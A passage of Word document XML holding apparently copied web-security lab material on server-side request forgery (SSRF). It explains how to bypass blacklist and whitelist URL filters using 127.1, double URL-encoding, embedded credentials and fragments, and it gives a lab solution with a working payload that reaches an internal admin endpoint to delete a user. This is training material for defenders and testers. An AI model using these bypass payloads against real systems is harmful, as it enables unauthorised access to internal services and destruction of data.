          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://127.1/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> and observe that the URL is blocked again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B44DCC" w14:textId="77777777" w:rsidR="00DB66E5" w:rsidRPr="00E4142C" w:rsidRDefault="00DB66E5" w:rsidP="00DB66E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Obfuscate the "a" by double-URL encoding it to %2561 to access the admin interface and delete the target user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D962F1B" w14:textId="77777777" w:rsidR="001063BC" w:rsidRPr="00E4142C" w:rsidRDefault="001063BC" w:rsidP="001063BC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSRF with whitelist-based input filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359A157F" w14:textId="77777777" w:rsidR="001063BC" w:rsidRPr="00E4142C" w:rsidRDefault="001063BC" w:rsidP="001063BC">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Some applications only allow input that matches, begins with, or contains, a whitelist of permitted values. In this situation, you can sometimes circumvent the filter by exploiting inconsistencies in URL parsing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7337782F" w14:textId="77777777" w:rsidR="001063BC" w:rsidRPr="00E4142C" w:rsidRDefault="001063BC" w:rsidP="001063BC">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The URL specification contains a number of features that are liable to be overlooked when implementing ad hoc parsing and validation of URLs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A951E" w14:textId="77777777" w:rsidR="001063BC" w:rsidRPr="00E4142C" w:rsidRDefault="001063BC" w:rsidP="001063BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>You can embed credentials in a URL before the hostname, using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> character. For example: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>https://expected-host@evil-host</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B07650E" w14:textId="77777777" w:rsidR="001063BC" w:rsidRPr="00E4142C" w:rsidRDefault="001063BC" w:rsidP="001063BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>You can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> character to indicate a URL fragment. For example: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>https://evil-host#expected-host</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BCBD07" w14:textId="77777777" w:rsidR="001063BC" w:rsidRPr="00E4142C" w:rsidRDefault="001063BC" w:rsidP="001063BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>https://expected-host.evil-host</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AC8171" w14:textId="77777777" w:rsidR="001063BC" w:rsidRPr="00E4142C" w:rsidRDefault="001063BC" w:rsidP="001063BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EECC55" w14:textId="77777777" w:rsidR="001063BC" w:rsidRPr="00E4142C" w:rsidRDefault="001063BC" w:rsidP="001063BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>You can use combinations of these techniques together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1C3D80" w14:textId="77777777" w:rsidR="00F476BC" w:rsidRPr="00E4142C" w:rsidRDefault="00F476BC" w:rsidP="00F476BC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lab: SSRF with whitelist-based input filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54135DD5" w14:textId="77777777" w:rsidR="00F476BC" w:rsidRPr="00E4142C" w:rsidRDefault="00F476BC" w:rsidP="00F476BC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>This lab has a stock check feature which fetches data from an internal system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06038F92" w14:textId="77777777" w:rsidR="00F476BC" w:rsidRPr="00E4142C" w:rsidRDefault="00F476BC" w:rsidP="00F476BC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>To solve the lab, change the stock check URL to access the admin interface at </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://localhost/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> and delete the user </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A79527" w14:textId="77777777" w:rsidR="00F476BC" w:rsidRPr="00E4142C" w:rsidRDefault="00F476BC" w:rsidP="00F476BC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>The developer has deployed an anti-SSRF defense you will need to bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D20EFA5" w14:textId="77777777" w:rsidR="00F476BC" w:rsidRPr="00E4142C" w:rsidRDefault="00F476BC" w:rsidP="00F476BC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:before="0"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73967AEF" w14:textId="77777777" w:rsidR="00F476BC" w:rsidRPr="00E4142C" w:rsidRDefault="00F476BC" w:rsidP="00F476BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF71589" w14:textId="77777777" w:rsidR="00F476BC" w:rsidRPr="00E4142C" w:rsidRDefault="00F476BC" w:rsidP="00F476BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Change the URL in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockApi</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> parameter to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> and observe that the application is parsing the URL, extracting the hostname, and validating it against a whitelist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18022C92" w14:textId="77777777" w:rsidR="00F476BC" w:rsidRPr="00E4142C" w:rsidRDefault="00F476BC" w:rsidP="00F476BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Change the URL to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://username@stock.weliketoshop.net/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> and observe that this is accepted, indicating that the URL parser supports embedded credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2674A3FF" w14:textId="77777777" w:rsidR="00F476BC" w:rsidRPr="00E4142C" w:rsidRDefault="00F476BC" w:rsidP="00F476BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Append a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> to the username and observe that the URL is now rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C44800" w14:textId="77777777" w:rsidR="00F476BC" w:rsidRPr="00E4142C" w:rsidRDefault="00F476BC" w:rsidP="00F476BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Double-URL encode the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>%2523</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> and observe the extremely suspicious "Internal Server Error" response, indicating that the server may have attempted to connect to "username".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0B0415" w14:textId="77777777" w:rsidR="00F476BC" w:rsidRPr="00E4142C" w:rsidRDefault="00F476BC" w:rsidP="00F476BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Change the URL to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> to access the admin interface and delete the target user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A096A5" w14:textId="77777777" w:rsidR="008371A8" w:rsidRPr="00E4142C" w:rsidRDefault="008371A8" w:rsidP="008371A8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bypassing SSRF filters via open redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BFDC21" w14:textId="77777777" w:rsidR="008371A8" w:rsidRPr="00E4142C" w:rsidRDefault="008371A8" w:rsidP="008371A8">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It is sometimes possible to circumvent any kind of filter-based defenses by exploiting an open redirection vulnerability.</w:t>
      </w:r>
    </w:p>
